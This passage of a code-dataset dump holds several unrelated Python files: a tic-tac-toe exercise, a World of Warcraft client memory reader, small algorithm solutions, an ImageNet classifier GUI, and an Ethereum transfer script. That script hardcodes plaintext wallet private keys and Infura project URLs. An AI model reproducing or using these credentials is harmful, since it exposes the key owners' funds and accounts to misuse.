False # <-- Variable to know if the game is a draw\r\nwidth = 400 # <-- Variable to know set the width of the map\r\nheight = 400 # <-- Variable to know set the height of the map\r\n\r\n\r\n# TTT ==> map\r\n# posy and posx are the position on x and y of the cursor\r\n\r\ndef drawXO(row, col):\r\n global TTT, XO, posy, posx\r\n\r\n # __________________________________________________________________________________\r\n # Figure out the position in the axe of row.\r\n # Complete the ellipsis below. If the \"row\" is equal to the number \"1\" so \"posx = 30\".\r\n # if ...\r\n # ...\r\n # Complete the ellipsis below. Else if \"row\" is equal to the number \"2\" so \"posx = width / 3 + 30\".\r\n # elif ...\r\n # ...\r\n # Complete the ellipsis below. Else if \"row\" is equal to the number \"3\" so \"posx = width / 3 * 2 + 30\".\r\n # elif ...\r\n # ...\r\n\r\n # __________________________________________________________________________________\r\n # Figure out the position in the axe of col.\r\n # Complete the ellipsis below. If the \"col\" is equal to the number \"1\" so \"posy = 30\".\r\n # if ...\r\n # ...\r\n # Complete the ellipsis below. Else if \"col\" is equal to the number \"2\" so \"posy = height / 3 + 30\".\r\n # elif ...\r\n # ...\r\n # Complete the ellipsis below. Else if \"col\" is equal to the number \"3\" so \"posy = height / 3 * 2 + 30\".\r\n # elif ...\r\n # ...\r\n\r\n TTT[row - 1][col - 1] = XO # We put the varaible at the place coordinates \"row\" and \"col\" on the map\r\n # if the player \"X\" or \"O\" finish to play we change the content of the variable XO by the value \"x\" or \"o\"\r\n if XO == 'x':\r\n screen.blit(x_img, (posy, posx))\r\n XO = 'o'\r\n else:\r\n screen.blit(o_img, (posy, posx))\r\n XO = 'x'\r\n pg.display.update() # we update the posting\r\n\r\n\r\ndef userClick(winner, draw):\r\n # get coordinates of mouse click, through pygame\r\n x, y = pg.mouse.get_pos()\r\n\r\n # get column of mouse click (1-3) (3 number the case on the axe x them number the axe y )\r\n # __________________________________________________________________________________\r\n # Figure out the position of the mouse on the map, axe of x (col).\r\n # Complete the ellipsis below. If the variable \"x\" is inferior to the number \"width / 3\" so \"col = 1\".\r\n # if ...\r\n # ...\r\n # Complete the ellipsis below. 
Else if the variable \"x\" is inferior to the number \"width / 3 * 2\" so \"col = 2\"..\r\n # elif ...\r\n # ...\r\n # Complete the ellipsis below. Else if the variable \"x\" is inferior to the variable \"width\" so \"col = 3\".\r\n # elif ...\r\n # ...\r\n # Complete the ellipsis below. Else \"x\" is not matching with previous check, so \"col\" variable will get the value \"none\".\r\n # else:\r\n # ...\r\n\r\n # __________________________________________________________________________________\r\n # Figure out the position of the mouse on the map, axe of y (row).\r\n # Complete the ellipsis below. If the variable \"y\" is inferior to the number \"height / 3\" so \"row = 1\".\r\n # if ...\r\n # ...\r\n # Complete the ellipsis below. Else if the variable \"y\" is inferior to the number \"height / 3 * 2\" so \"row = 2\"..\r\n # elif ...\r\n # ...\r\n # Complete the ellipsis below. Else if the variable \"y\" is inferior to the variable \"height\" so \"row = 3\".\r\n # elif ...\r\n # ...\r\n # Complete the ellipsis below. Else \"y\" is not matching with previous check, so \"row\" variable will get the value \"none\".\r\n # else:\r\n # ...\r\n # get row of mouse click (1-3)\r\n\r\n if row and col and TTT[row - 1][col - 1] is None:\r\n global XO\r\n # draw the x or o on screen\r\n drawXO(row, col)\r\n return check_win(TTT, winner, draw, XO)\r\n\r\n\r\ndef reset_game():\r\n global winner, XO, draw\r\n time.sleep(2) # sleep to make the program in pause, for 2 seconds\r\n\r\n # Complete the ellipsis below. If we reset the game what should be the value of XO variable ?\r\n # XO = ..\r\n\r\n # Complete the ellipsis below. If we reset the game what should be the value of XO draw ?\r\n # draw = ...\r\n\r\n game_opening(draw, winner, XO)\r\n\r\n # Complete the ellipsis below. 
If we reset the game what should be the value of the winner variable ?\r\n # winner = ...\r\n\r\n return [[None] * 3, [None] * 3, [None] * 3] # We reset the map as at the beginning.\r\n\r\n\r\ngame_opening(draw, winner, XO)\r\n\r\n# run the game loop forever\r\nwhile True:\r\n for event in pg.event.get():\r\n # We check if the type of the event is equal to QUIT, i.e. the user wants to close the window\r\n if event.type == QUIT:\r\n pg.quit()\r\n sys.exit()\r\n # We check if the type of the event is equal to MOUSEBUTTONDOWN, meaning the user has pressed the mouse, and\r\n # we check what to do depending on the position of the mouse.\r\n elif event.type == MOUSEBUTTONDOWN:\r\n # the user clicked; place an X or O\r\n res = userClick(winner, draw)\r\n winner = res[0]\r\n draw = res[1]\r\n TTT = res[2]\r\n # In case the variable draw or winner is defined, the game has ended, so we reset the game\r\n if winner or draw:\r\n TTT = reset_game()\r\n pg.display.update()\r\n CLOCK.tick(fps)\r\n","sub_path":"src/tictactoe_game_to_complete.py","file_name":"tictactoe_game_to_complete.py","file_ext":"py","file_size_in_byte":5479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"356731228","text":"import string\nfrom wowapi.objects.object import Object, enforce_validity\nfrom wowapi.spell import Spell, Aura\nfrom wowapi.position import Position\n\nclass Unit(Object):\n\tdef __init__(self, *args, **kwargs):\n\t\tObject.__init__(self, *args, **kwargs)\n\t\t\n\tdef __repr__(self):\n\t\treturn \"<Unit %s at %s>\" % (self.name, hex(self.base))\n\t\t\n\t@property\n\t@enforce_validity\n\tdef position(self):\n\t\treturn Position(\n\t\t\tx=self.get_base_float('UNIT_XLOCATION'),\n\t\t\ty=self.get_base_float('UNIT_YLOCATION'),\n\t\t\tz=self.get_base_float('UNIT_ZLOCATION')\n\t\t)\n\t\n\t@property\n\tdef x(self):\n\t\treturn self.position.x\n\t\t\n\t@property\n\tdef y(self):\n\t\treturn self.position.y\n\t\t\n\t@property\n\tdef z(self):\n\t\treturn self.position.z\n\t\t\n\t@property\n\t@enforce_validity\n\tdef facing(self):\n\t\treturn (\n\t\t\tself.get_base_float('UNIT_FACING_HORIZONTAL'),\n\t\t\tself.get_base_float('UNIT_FACING_VERTICAL')\n\t\t)\n\t\t\n\t@property\n\t@enforce_validity\n\tdef movement_flags(self):\n\t\treturn self.get_base_int('UNIT_MOVEMENTFLAGS')\n\t\t\n\tdef has_movement_flag(self, flag):\n\t\treturn bool(self.wow.constants['MOVEMENTFLAG_%s' % string.upper(flag)] & self.movement_flags)\n\t\t\n\t@property\n\t@enforce_validity\n\tdef speed(self):\n\t\treturn self.get_base_float('UNIT_RUNSPEED_CURRENT')\n\t\t\n\t@property\n\t@enforce_validity\n\tdef walk_speed(self):\n\t\treturn self.get_base_float('UNIT_RUNSPEED_WALK')\n\t\t\n\t@property\n\t@enforce_validity\n\tdef max_speed(self):\n\t\treturn self.get_base_float('UNIT_RUNSPEED_MAX')\n\t\n\t@property\n\t@enforce_validity\n\tdef back_speed(self):\n\t\treturn self.get_base_float('UNIT_RUNSPEED_BACK')\n\t\t\n\t@property\n\t@enforce_validity\n\tdef max_airspeed(self):\n\t\treturn self.get_base_float('UNIT_AIRSPEED_MAX')\n\t\t\n\t@property\n\t@enforce_validity\n\tdef casting(self):\n\t\ttocast = self.get_base_int('UNIT_SPELL_TOCAST')\n\t\tcasting = self.get_base_int('UNIT_SPELL_CASTING')\n\t\ttarget = (\n\t\t\tself.get_base_int('UNIT_SPELL_TARGETGUID_LOW'),\n\t\t\tself.get_base_int('UNIT_SPELL_TARGETGUID_HIGH')\n\t\t)\n\t\tstart = self.get_base_int('UNIT_SPELL_TIMESTART')\n\t\tend = self.get_base_int('UNIT_SPELL_TIMEEND')\n\t\t\n\t\tif tocast or casting:\n\t\t\treturn Spell(casting) if casting 
else Spell(tocast), target, start, end\n\t\telse:\n\t\t\treturn None, None, None, None\n\t\t\t\n\t@property\n\t@enforce_validity\n\tdef channeling(self):\n\t\tchanneling = self.get_base_int('UNIT_SPELL_CHANNELING')\n\t\tstart = self.get_base_int('UNIT_SPELL_CHANNELTIMESTART')\n\t\tend = self.get_base_int('UNIT_SPELL_CHANNELTIMEEND')\n\t\t\n\t\tif channeling:\n\t\t\treturn Spell(channeling), start, end\n\t\telse:\n\t\t\treturn None, None, None\n\t\t\t\n\t@property\n\t@enforce_validity\n\tdef selection_flags(self):\n\t\treturn self.get_base_int('UNIT_SELECTIONFLAGS')\n\t\t\n\t@property\n\tdef is_selected(self):\n\t\treturn bool((1 << 12) & self.selection_flags)\n\t\t\n\t@property\n\tdef is_focused(self):\n\t\treturn bool((1 << 13) & self.selection_flags)\n\t\t\n\t@property\n\t@enforce_validity\n\tdef auras(self):\n\t\tvalid_auras = self.get_base_int('UNIT_AURAS_VALIDCOUNT')\n\t\tif valid_auras == 0xFFFFFFFF:\n\t\t\tvalid_auras = self.get_base_int('UNIT_AURAS_OVERFLOWVALIDCOUNT')\n\t\tif valid_auras <= 0 or valid_auras > 56:\n\t\t\treturn [] # not a valid aura count\n\n\t\tauras_base = self.base + self.wow.offsets['UNIT_AURAS_START']\n\t\tif valid_auras > 16: # aura overflow\n\t\t\tauras_base = self.base + self.wow.offsets['UNIT_AURAS_OVERFLOWPTR1']\n\t\t\tif not auras_base:\n\t\t\t\treturn [] # error finding aura overflow ptr\n\n\t\tauras = {}\n\t\tfor i in range(0, valid_auras):\n\t\t\taura_base = auras_base + (i * 0x18)\n\t\t\tspell_id = self.wow.vm[aura_base + self.wow.offsets['AURA_ENTRYID']]\n\t\t\tif spell_id:\n\t\t\t\tauras[spell_id] = Aura(\n\t\t\t\t\tspell=Spell(spell_id),\n\t\t\t\t\tguid=(self.wow.vm[aura_base + self.wow.offsets['AURA_GUID']], self.wow.vm[aura_base + self.wow.offsets['AURA_GUID'] + 0x4]),\n\t\t\t\t\tbytes=self.wow.vm[aura_base + self.wow.offsets['AURA_BYTES']],\n\t\t\t\t\tduration=self.wow.vm[aura_base + self.wow.offsets['AURA_DURATION']],\n\t\t\t\t\texpiration=self.wow.vm[aura_base + self.wow.offsets['AURA_EXPIRATION']]\n\t\t\t\t)\n\t\treturn auras\n\n\t@property\n\t@enforce_validity\n\tdef name(self):\n\t\tname_base = self.get_base_int('UNIT_NAME_BASE')\n\t\tif not name_base:\n\t\t\treturn None\n\t\t\t\n\t\tname_ptr = self.wow.vm[name_base + self.wow.offsets['UNIT_NAME_PTR']]\n\t\tname = self.wow.vm.read_string(name_ptr)\n\t\treturn name if name else None\n\t\t\n\t@property\n\t@enforce_validity\n\tdef description(self):\n\t\tname_base = self.get_base_int('UNIT_NAME_BASE')\n\t\tif not name_base:\n\t\t\treturn None\n\t\t\t\n\t\tdesc_ptr = self.wow.vm[name_base + self.wow.offsets['UNIT_DESC_PTR']]\n\t\tdesc = self.wow.vm.read_string(desc_ptr)\n\t\treturn desc if desc else None\n\t\t\n\t@property\n\t@enforce_validity\n\tdef pet(self):\n\t\tguid = self.get_field_guid('UNIT_FIELD_CHARM')\n\t\tif guid and guid in self.wow.objects:\n\t\t\treturn self.wow.objects[guid]\n\t\telse:\n\t\t\treturn None\n\t\t\t\n\t@property\n\t@enforce_validity\n\tdef summon(self):\n\t\tguid = self.get_field_guid('UNIT_FIELD_SUMMON')\n\t\tif guid and guid in self.wow.objects:\n\t\t\treturn self.wow.objects[guid]\n\t\telse:\n\t\t\treturn None\n\t\t\t\n\t@property\n\t@enforce_validity\n\tdef charmed_by(self):\n\t\tguid = self.get_field_guid('UNIT_FIELD_CHARMEDBY')\n\t\tif guid and guid in self.wow.objects:\n\t\t\treturn self.wow.objects[guid]\n\t\telse:\n\t\t\treturn None\n\t\t\t\n\t@property\n\t@enforce_validity\n\tdef summoned_by(self):\n\t\tguid = self.get_field_guid('UNIT_FIELD_SUMMONEDBY')\n\t\tif guid and guid in self.wow.objects:\n\t\t\treturn 
self.wow.objects[guid]\n\t\telse:\n\t\t\treturn None\n\t\t\t\n\t@property\n\t@enforce_validity\n\tdef created_by(self):\n\t\tguid = self.get_field_guid('UNIT_FIELD_CREATEDBY')\n\t\tif guid and guid in self.wow.objects:\n\t\t\treturn self.wow.objects[guid]\n\t\telse:\n\t\t\treturn None\n\t\t\t\n\t@property\n\t@enforce_validity\n\tdef target(self):\n\t\tguid = self.get_field_guid('UNIT_FIELD_TARGET')\n\t\tif guid and guid in self.wow.objects:\n\t\t\treturn self.wow.objects[guid]\n\t\telse:\n\t\t\treturn None\n\t\t\t\n\t@property\n\t@enforce_validity\n\tdef health(self):\n\t\treturn self.get_field_int('UNIT_FIELD_HEALTH')\n\t\t\t\n\t@property\n\t@enforce_validity\n\tdef level(self):\n\t\treturn self.get_field_int('UNIT_FIELD_LEVEL')\n\t\t\n\t","sub_path":"objects/unit.py","file_name":"unit.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"572033210","text":"\"\"\"\nPower Of Two Integers\n=====================\n\nGiven a positive integer which fits in a 32 bit signed integer, find if it can be expressed as A^P where P > 1 and A > 0. A and P both should be integers.\n\nExample\n\nInput : 4\nOutput : True \nas 2^2 = 4.\n\"\"\"\n\nfrom __future__ import print_function\n\n\ndef is_power(n, k):\n # Returns True if n = k ** p\n # False otherwise\n # Time complexity: log_k(n)\n while True:\n n, rem = divmod(n, k)\n if rem:\n return False\n if n==1:\n return True\n\n\ndef check(n):\n # Checks for every possible divisor if n is a power of it.\n # Time complexity: sum of log_k(n) for k in 2..sqrt(n)\n for k in range(2, int(n ** .5) + 1):\n if is_power(n, k):\n return True\n return False\n\n\nprint(check(72))\n","sub_path":"InterviewBit/Math/PowerOfTwoIntegers.py","file_name":"PowerOfTwoIntegers.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"325401292","text":"n,m=map(int,input().split())\na=[[0]*n for i in range(n)]\nfor i in range(m):\n b,k=map(int,input().split())\n a[b-1][k-1]=1\ntimer=[0]\ntin=[0]*n\ntout=[0]*n\nused=[0]*n\np=[0]*n\ncycle=[False]\ndef dfs(v):\n used[v]=1\n timer[0]+=1\n tin[v]=timer[0]\n for i in range(n):\n to=a[v][i]\n if to==1:\n if used[i]==0:\n p[i]=v\n dfs(i)\n elif used[i]==1 and i!=p[v]:\n cycle[0]=True\n timer[0]+=1\n tout[v]=timer[0]\n used[v]=2\ndfs(0)\nfor i in range(len(used)):\n if used[i]==0:\n dfs(i)\n\nif cycle[0]==False:\n d=[]\n for i in range(n):\n d.append([tin[i],tout[i],i])\n d=sorted(d,key=lambda x:x[1],reverse=True)\n for i in d:\n print(i[2]+1,end=\" \")\nelse:\n print(-1)\n\n","sub_path":"sikl.py","file_name":"sikl.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"131857342","text":"import json\nimport numpy as np\nimport tkinter as tk\nfrom tkinter import ttk\nfrom pathlib import Path\nfrom tkinter import filedialog\nfrom tkinter import messagebox\nfrom PIL import ImageTk, Image\nfrom tensorflow.keras.applications import mobilenet_v2\nfrom tensorflow.python.keras.preprocessing import image\n\nmodel = mobilenet_v2.MobileNetV2(weights='imagenet') # load the pretrained model\ninitialdir = Path.cwd() # initial directory; can be switched to the pictures folder Path.home() / 'Pictures'\nimg = None # currently opened image\nwin_result = None # window that shows the results\nclass_trans_path = 'class_trans.json' # path of the translation file\nclass_trans = json.load(open(class_trans_path)) if Path(class_trans_path).exists() else {}\n\n\ndef scale(size, width=None, height=None):\n 
\"\"\"Get the width and height scaled proportionally\"\"\"\n if not width and not height:\n width, height = size\n if not width or not height:\n _width, _height = size\n height = width * _height / _width if width else height\n width = height * _width / _height if height else width\n return int(width), int(height)\n\n\ndef img_resize(event=None):\n \"\"\"Display the image\"\"\"\n global img\n if img:\n _img = img.resize(scale(img.size, height=win.winfo_height()))\n _img = ImageTk.PhotoImage(_img)\n label.config(image=_img)\n label.image = _img\n\n\ndef close_win_result():\n \"\"\"Close the result window\"\"\"\n global win_result\n if win_result:\n try:\n win_result.destroy()\n except:\n pass\n\n\ndef on_closing():\n \"\"\"Window close event\"\"\"\n if messagebox.askokcancel('关闭', '是否退出程序?'):\n win.destroy()\n close_win_result()\n\n\ndef open_file():\n \"\"\"Open an image\"\"\"\n global initialdir\n global img\n global win_result\n file_path = filedialog.askopenfilename(title='选择图片', initialdir=initialdir,\n filetypes=[('image files', ('.png', '.jpg', '.jpeg', '.gif'))])\n if file_path:\n path = Path(file_path)\n initialdir = path.parent\n img = Image.open(file_path)\n img_resize()\n\n _img = image.load_img(file_path, target_size=(224, 224))\n _img = image.img_to_array(_img)\n _img = np.expand_dims(_img, axis=0)\n _img = mobilenet_v2.preprocess_input(_img)\n pred_class = model.predict(_img)\n n = 10\n top_n = mobilenet_v2.decode_predictions(pred_class, top=n)\n print(path)\n for i in top_n[0]:\n print(i)\n print()\n\n close_win_result()\n win_result = tk.Tk()\n win_result.title(path.name)\n table = ttk.Treeview(win_result, columns=['序号', '对象', '标签', '翻译', '概率'], show='headings')\n table.column('序号', width=100)\n table.column('对象', width=100)\n table.column('标签', width=100)\n table.column('翻译', width=100)\n table.column('概率', width=100)\n table.heading('序号', text='序号')\n table.heading('对象', text='对象')\n table.heading('标签', text='标签')\n table.heading('翻译', text='翻译')\n table.heading('概率', text='概率')\n for i, x in enumerate(top_n[0]):\n index = str(i + 1)\n objectname = x[0]\n classname = x[1]\n transname = class_trans.get(classname, classname)\n table.insert('', i, text=index,\n values=[index, objectname, classname, transname, '{:.2f}%'.format(float(x[2] * 100))])\n table.pack(fill=tk.BOTH, expand=True)\n win_result.mainloop()\n\n\nwin = tk.Tk()\nwin.title('ImageNet图像分类') # window title\nmenu = tk.Menu(win)\nmenu.add_command(label='打开', command=open_file)\nwin.config(menu=menu)\nlabel = tk.Label(win, text='左上角打开图片')\nlabel.pack(fill=tk.BOTH, expand=True)\nwin.bind('<Configure>', img_resize)\nwin.geometry('600x300+300+300')\nwin.minsize(200, 200)\nwin.protocol('WM_DELETE_WINDOW', on_closing)\nwin.mainloop()\n","sub_path":"直接调用预训练模型GUI.py","file_name":"直接调用预训练模型GUI.py","file_ext":"py","file_size_in_byte":3977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"430571996","text":"import random\nimport json\nfrom web3 import Web3\n\nMAIN_URL = \"https://mainnet.infura.io/v3/bb055071bba745488eda95512a6d0035\"\nURL = 'https://8cf41633363c49a584fbfb0b556a5927.ropsten.rpc.rivet.cloud/'\nURL = 'wss://ropsten.infura.io/ws/v3/bb055071bba745488eda95512a6d0035'\n\nw3 = Web3(Web3.WebsocketProvider(URL))\n# w3 = Web3(Web3.HTTPProvider(URL))\n\ndef _checking(_addr):\n '''\n The input is a string that is checked to see whether it is a valid address.\n In the end either the address or False is returned.\n '''\n if not isinstance(_addr, str):\n print(\"ادرس بد وارد کردی باید یک استرینگ باشه\")\n return False\n try:\n if not w3.isConnected():\n print(\"نت مشکل داره \")\n return False\n addr_ 
= Web3.toChecksumAddress(_addr)\n if not addr_:\n print(\"ادرس بدی وارد کردی شرمنده تم\")\n return False\n return addr_\n except Exception as e:\n print(e)\n print(\"یه مشکلی وجود داره ×ـ× مثلا نتت ضعیفه\")\n return False\n\n\ndef balance(_addr: str) -> float:\n \"\"\"\n Pass the desired address to this function.\n The output is a number, which is the remaining balance of that account :)\n \"\"\"\n addr_ = _checking(_addr)\n return float(w3.eth.get_balance(addr_) / 10 ** 18)\n\n\ndef transfer(_to_addr: str, _value: float, private_key: str, public_key: str, _nounce: int):\n to_addr_ = _checking(_to_addr)\n public_key = _checking(public_key)\n\n if to_addr_ and public_key:\n try:\n if balance(public_key) < _value:\n print(\"پول ت کمه ، نمیتونی کمک کنی \")\n return False\n p = w3.eth.gas_price\n\n transaction = {\n 'from': public_key,\n 'to': to_addr_,\n \"gas\": \"0x200000\",\n \"gasPrice\": p,\n \"nonce\": _nounce,\n \"value\": int(_value * 10 ** 18),\n }\n raw_trx = w3.eth.account.privateKeyToAccount(\n private_key).sign_transaction(transaction)\n res = w3.eth.send_raw_transaction(raw_trx.rawTransaction).hex()\n return res\n except Exception as e:\n print(e)\n print(\"یک اتفاقی افتاده که من نمیدونم ....\")\n return 0\n\n\n## Testing Functions with my wallet\n\n# _public_key = Web3.toChecksumAddress(\"0xAf77fB90baCE88edad8be674232C4a072BdC29A3\")\n# print(balance(\"0xAf77fB90baCE88edad8be674232C4a072BdC29A3\"))\n# print(balance(\"0xAf77fB90baCE88edad8be674232C4a072BdC29A3\"))\n# _nounce = w3.eth.get_transaction_count(_public_key)\n# print(\n# transfer(\"0x603c7564035A8c0a7eB9a74a76113563ffdbD36F\",\n# 0.01,\n# \"a49443970e8c717e218d312c0a7d1b390bea090cd3809011fd5cb926851f2e2b\",\n# \"0xAf77fB90baCE88edad8be674232C4a072BdC29A3\",\n# _nounce)\n# )\n# _nounce += 1\n#\n# print(\n# transfer(\"0x603c7564035A8c0a7eB9a74a76113563ffdbD36F\",\n# 0.01,\n# \"a49443970e8c717e218d312c0a7d1b390bea090cd3809011fd5cb926851f2e2b\",\n# \"0xAf77fB90baCE88edad8be674232C4a072BdC29A3\",\n# _nounce)\n# )\n\nnavid_wallet = \"0xAf77fB90baCE88edad8be674232C4a072BdC29A3\"\nnavid_private_key = \"a49443970e8c717e218d312c0a7d1b390bea090cd3809011fd5cb926851f2e2b\"\n\nmy_wallet = \"0x9200e872f21B28E61600a62A3628ff30688e107C\"\nmy_private_key = \"e3aa1cb4960222f0731a884d96c377fa00ba64424fd0bb76ba97bb7fe272d937\"\n_public_key = Web3.toChecksumAddress(my_wallet)\n_nounce = w3.eth.get_transaction_count(_public_key)\n\nwallets = eval(open('wallets.json', 'r').read())\n\n\nrandom_list = list()\nrandom_balances = list()\nfor i in range(20):\n index = random.randint(0, len(wallets)-1)\n\n random_list.append(wallets[index])\n random_balances.append(balance(wallets[index]))\n\n\nwallets_and_their_balances = dict(zip(random_list, random_balances))\nmean = sum(random_balances)/len(random_balances)\n\nprint(mean)\nprint(wallets_and_their_balances)\n\ntransactions = list()\nfor k, v in wallets_and_their_balances.items():\n if v < mean/10:\n transaction = transfer(k, 0.05, my_private_key, my_wallet, _nounce)\n _nounce += 1\n transactions.append('-'*4+ ' > ' + str(transaction) + '\\n')\n\nf = open('transactions.txt', 'w', encoding='UTF-8')\nf.writelines(transactions)\nf.close()\n\nprint(balance(my_wallet))\n\n# by Shervin Hasanzadeh\n","sub_path":"block_chain_wallet.py","file_name":"block_chain_wallet.py","file_ext":"py","file_size_in_byte":4546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"423510119","text":"# pprint_arbitrary_object.py\n\nfrom pprint import pprint\n\n\nclass node:\n\n def __init__(self, 
name, contents=[]):\n self.name = name\n self.contents = contents[:]\n\n def __repr__(self):\n return (\n 'node(' + repr(self.name) + ', ' +\n repr(self.contents) + ')'\n )\n\n\ntrees = [\n node('nodo-1'),\n node('nodo-2', [node('nodo-2-1')]),\n node('nodo-3', [node('nodo-3-1')]),\n]\npprint(trees)\n","sub_path":"dumpscripts/pprint_arbitrary_object.py","file_name":"pprint_arbitrary_object.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"437492439","text":"\n\nfrom xai.brain.wordbase.nouns._islam import _ISLAM\n\n# class header\nclass _ISLAMS(_ISLAM, ):\n\tdef __init__(self,): \n\t\t_ISLAM.__init__(self)\n\t\tself.name = \"ISLAMS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"islam\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_islams.py","file_name":"_islams.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"258940025","text":"import subprocess\n\nclass CloudStorageTransfer():\n def __init__(self, source_uri, destination_uri, parallel=True):\n self.source_uri = source_uri\n self.destination_uri = destination_uri\n self.parallel = parallel\n\n def copy(self, mode=\"cp\", directory=True):\n subcommand = \"\"\n if self.parallel:\n if directory:\n subcommand = \"-m {} -r\".format(mode)\n else:\n subcommand = \"-m {} \".format(mode)\n else:\n if directory:\n subcommand = \"{} -r\".format(mode)\n else:\n subcommand = \"{}\".format(mode)\n\n command = \"\"\"gsutil {} {} {}\"\"\".format(subcommand, self.source_uri, self.destination_uri)\n process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)\n output, error = process.communicate()\n print(\"output: {}\".format(output.decode('utf-8')), \"error: {}\".format(error))","sub_path":"airflow/dags/cloudDataTransfer/cloudStorageTransferService.py","file_name":"cloudStorageTransferService.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"3626667","text":"\nclass Solution:\n\t# @param intervals, a list of Intervals\n\t# @param newInterval, an Interval\n\t# @return a list of Interval\n\tdef insert(self, intervals, newInterval):\n\t\tn=len(intervals)\n\t\tif n==0:\n\t\t\treturn [newInterval]\n\n\t\tre=[]\n\t\tfor i in range(n):\n\t\t\tcur=intervals[i]\n\t\t\tif cur.end<newInterval.start:\n\t\t\t\tre.append(cur)\n\t\t\telif cur.start>newInterval.end:\n\t\t\t\tre.append(newInterval)\n\t\t\t\tnewInterval = cur\n\t\t\telse:\n\t\t\t\tnewInterval.start=min(cur.start, newInterval.start)\n\t\t\t\tnewInterval.end=max(cur.end, newInterval.end)\n\t\tre.append(newInterval)\n\t\treturn re\n","sub_path":"code/InsertInterval.py","file_name":"InsertInterval.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"89726564","text":"''' Server for OOP '''\n\nfrom socket import *\nfrom time import ctime\n\nclass Server:\n ''' Server '''\n\n def __init__(self, host, port, bufsiz=1024):\n ''' Initiate '''\n self.host = host\n self.port = port\n self.addr = (host, port)\n self.bufsiz = bufsiz\n self.tcpserve = socket(AF_INET, SOCK_STREAM)\n self.tcpserve.bind(self.addr)\n self.tcpserve.listen(5)\n\n def startActivity(self):\n ''' Start TCP server '''\n while True:\n print('waiting for connection...')\n conn, addr = self.tcpserve.accept() # accept a client on a dedicated socket, keeping the listener intact\n print('... connected from: ', addr)\n\n while True:\n data = conn.recv(self.bufsiz)\n if not data:\n break\n data = str(data, encoding = 'UTF-8')\n data = '[%s] %s' %(ctime(), data)\n data = bytes(data, encoding = 'UTF-8')\n conn.send(data)\n conn.close()\n","sub_path":"Programing for Python/Study/tsTserv_OOP.py","file_name":"tsTserv_OOP.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"162508033","text":"# -*- coding: utf-8 -*-\n\nimport fileinput\n\nvals = None\nfor line in fileinput.input():\n vals = [int(x) for x in line.split()]\n\nvals.sort()\n\nif vals[1] % vals[0] == 0:\n print('Sao Multiplos')\nelse:\n print('Nao sao Multiplos')\n","sub_path":"1044/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"268849949","text":"sandwich_orders = [\r\n 'cheese', 'veggie', 'pastrami', 'turkey',\r\n 'pastrami', 'ham', 'pastrami']\r\nfinished_sandwiches = []\r\n\r\nprint(\"Unfortunately, we're all out of pastrami.\")\r\nwhile 'pastrami' in sandwich_orders:\r\n sandwich_orders.remove('pastrami')\r\n\r\nprint(\"\\n\")\r\nwhile sandwich_orders:\r\n current_sandwich = sandwich_orders.pop()\r\n print(\"I'm working on your \" + current_sandwich + \" sandwich.\")\r\n finished_sandwiches.append(current_sandwich)\r\n\r\nprint(\"\\n\")\r\nfor sandwich in finished_sandwiches:\r\n print(\"I made a \" + sandwich + \" sandwich.\")","sub_path":"5.21.py","file_name":"5.21.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"195395927","text":"# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom .. 
import base_solver\nfrom ...settings import SDE_TYPES, NOISE_TYPES, LEVY_AREA_APPROXIMATIONS\n\n\nclass Midpoint(base_solver.BaseSDESolver):\n weak_order = 1.0\n sde_type = SDE_TYPES.stratonovich\n noise_types = NOISE_TYPES.all()\n levy_area_approximations = LEVY_AREA_APPROXIMATIONS.all()\n\n def __init__(self, sde, **kwargs):\n self.strong_order = 0.5 if sde.noise_type == NOISE_TYPES.general else 1.0\n super(Midpoint, self).__init__(sde=sde, **kwargs)\n\n def step(self, t0, t1, y0, extra0):\n del extra0\n dt = t1 - t0\n I_k = self.bm(t0, t1)\n\n f, g_prod = self.sde.f_and_g_prod(t0, y0, I_k)\n\n half_dt = 0.5 * dt\n\n t_prime = t0 + half_dt\n y_prime = y0 + half_dt * f + 0.5 * g_prod\n\n f_prime, g_prod_prime = self.sde.f_and_g_prod(t_prime, y_prime, I_k)\n\n y1 = y0 + dt * f_prime + g_prod_prime\n\n return y1, ()\n","sub_path":"torchsde/_core/methods/midpoint.py","file_name":"midpoint.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"67074255","text":"'''\n\n4 verticies\n\n\t1 